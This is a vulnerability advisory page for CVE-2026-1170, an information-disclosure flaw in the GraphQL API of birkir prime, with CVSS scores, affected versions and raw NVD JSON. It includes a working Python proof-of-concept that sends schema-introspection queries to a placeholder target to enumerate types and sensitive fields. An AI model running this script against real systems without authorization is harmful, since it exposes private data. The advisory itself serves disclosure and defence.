Security Vulnerability Report
中文
CVE-2026-1170 CVSS 5.3 MEDIUM

CVE-2026-1170

Published: 2026-01-19 18:16:05
Last Modified: 2026-02-23 09:16:49
Source: [email protected]

Description

A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:* - VULNERABLE
birkir prime < 0.4.0.beta.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-1170 PoC - birkir prime GraphQL Information Disclosure # Target: birkir prime <= 0.4.0.beta.0 # Endpoint: /graphql import requests import json TARGET_URL = "http://target.com/graphql" def exploit_information_disclosure(): """Exploit for CVE-2026-1170 - GraphQL API Information Disclosure""" # PoC 1: GraphQL Introspection Query to enumerate schema introspection_query = { "query": """ { __schema { types { name fields { name type { name } } } queryType { name fields { name } } } } """ } # PoC 2: Query specific types for sensitive data type_query = { "query": """ { __type(name: "User") { name fields { name type { name kind } } } } """ } # PoC 3: Introspection with description to find sensitive fields description_query = { "query": """ { __schema { types { name description fields(includeDeprecated: true) { name description isDeprecated deprecationReason } } } } """ } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-1170-PoC)" } print("[*] Testing CVE-2026-1170 - birkir prime GraphQL Info Disclosure") print(f"[*] Target: {TARGET_URL}") for i, payload in enumerate([introspection_query, type_query, description_query], 1): try: print(f"\n[*] Sending PoC payload {i}...") response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if "errors" not in data and data.get("data"): print(f"[+] PoC {i} SUCCESS - Information disclosure detected!") print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}...") else: print(f"[-] PoC {i} - Response may contain errors or no data") else: print(f"[-] PoC {i} - HTTP {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] PoC {i} - Request failed: {e}") print("\n[*] PoC execution completed") print("[*] Recommendation: Disable GraphQL introspection in production") if __name__ == "__main__": exploit_information_disclosure()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1170", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:04.773", "lastModified": "2026-02-23T09:16:48.947", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in birkir prime up to 0.4.0.beta.0. This issue affects some unknown processing of the file /graphql of the component GraphQL API. Performing a manipulation results in information disclosure. The attack may be initiated remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se detectó una vulnerabilidad en birkir prime hasta 0.4.0.beta.0. Este problema afecta a algún procesamiento desconocido del archivo /graphql del componente GraphQL API. Realizar una manipulación resulta en revelación de información. El ataque puede iniciarse de forma remota. El exploit ahora es público y puede ser utilizado. El proyecto fue informado del problema con antelación a través de un informe de problema, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.0", "matchCriteriaId": "65419F9E-4813-4B36-BA74-1839A5525EFC"}]}]}], "references": [{"url": "https://github.com/birkir/prime/", "source": "[email protected]"}, {"url": "https://github.com/birkir/prime/issues/541", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341764", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341764", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.731100", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.